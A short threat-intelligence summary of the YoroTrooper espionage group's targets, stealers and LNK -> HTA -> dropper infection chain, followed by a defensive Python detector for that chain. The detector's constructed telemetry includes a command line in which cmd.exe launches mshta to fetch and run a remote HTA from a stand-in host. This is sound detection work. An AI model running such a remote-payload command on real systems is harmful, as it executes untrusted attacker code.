A threat actor identified as “YoroTrooper” has had several espionage campaigns attributed to it by Cisco Talos since June 2022. YoroTrooper has targeted government and energy organizations in the Commonwealth of Independent States (CIS), a health care agency in the European Union and the World Intellectual Property Organization (WIPO). Because several of the implants used contain Cyrillic characters, Cisco Talos believes the group to be Russian-speaking. Its toolkit consists primarily of custom and open-source Python-based information stealers such as Stink Stealer, compiled into executables with tools like PyInstaller. For remote access, YoroTrooper primarily deployed commodity malware such as AveMaria, Warzone RAT, LodaRAT and Meterpreter. The infection chain relies on spear-phishing to convince victims to download a malicious archive containing .LNK files. These shortcut files download a malicious HTA file, which in turn loads the final dropper that starts the Python-based stealer.
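As an added example (not code from Cisco Talos or the report), a small detector over constructed process-creation telemetry that looks for the LNK -> HTA -> dropper sequence described above: mshta.exe, the Windows host for HTA files, launching a remote or user-staged HTA from under Explorer (directly, or via a script host such as cmd.exe, which is how a shortcut's target is run), followed by a child process started from a user-writable path. The event fields, sample hosts and file paths are assumptions made for the example.

```python
import re
from collections import namedtuple

ProcEvent = namedtuple("ProcEvent", "pid ppid image cmdline")  # one process-creation event
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe"}
USER_WRITABLE = re.compile(r"\\(temp|downloads|appdata)\\", re.I)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def suspicious_hta_source(cmdline):
    """HTA fetched over HTTP(S) or staged in a user-writable directory."""
    c = cmdline.lower()
    return "http://" in c or "https://" in c or (".hta" in c and bool(USER_WRITABLE.search(c)))

def lineage(ev, by_pid):
    """[ev, parent, grandparent, ...] following ppid links, cycle-safe."""
    chain, seen = [ev], {ev.pid}
    while chain[-1].ppid in by_pid and chain[-1].ppid not in seen:
        chain.append(by_pid[chain[-1].ppid])
        seen.add(chain[-1].pid)
    return chain

def find_lnk_hta_chains(events):
    """Flag mshta.exe runs that look like a shortcut-launched HTA stage; report its dropper if seen."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        if basename(ev.image) != "mshta.exe" or not suspicious_hta_source(ev.cmdline):
            continue
        names = [basename(e.image) for e in lineage(ev, by_pid)]
        # A shortcut opened in Explorer runs its target directly or via a script host.
        direct = len(names) >= 2 and names[1] == "explorer.exe"
        via_host = len(names) >= 3 and names[1] in SCRIPT_HOSTS and names[2] == "explorer.exe"
        if not (direct or via_host):
            continue
        # The HTA's job is to stage the dropper: note any child started from a user-writable path.
        dropper = next((basename(c.image) for c in events
                        if c.ppid == ev.pid and USER_WRITABLE.search(c.image)), None)
        hits.append({"chain": names[:(2 if direct else 3)][::-1], "dropper": dropper})
    return hits

# Constructed sample telemetry (not from the report): one LNK -> HTA -> dropper chain, one benign HTA.
EVENTS = [
    ProcEvent(4, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(8, 4, r"C:\Windows\System32\cmd.exe", "cmd.exe /c mshta https://stage.example/loader.hta"),
    ProcEvent(12, 8, r"C:\Windows\System32\mshta.exe", "mshta https://stage.example/loader.hta"),
    ProcEvent(16, 12, r"C:\Users\alice\AppData\Local\Temp\svc.exe", "svc.exe"),
    ProcEvent(20, 4, r"C:\Windows\System32\mshta.exe", r"mshta C:\Program Files\Vendor\help.hta"),
]
```

Running `find_lnk_hta_chains(EVENTS)` returns the single explorer.exe -> cmd.exe -> mshta.exe chain with `svc.exe` as the staged dropper, while the vendor help file launched from Program Files is ignored.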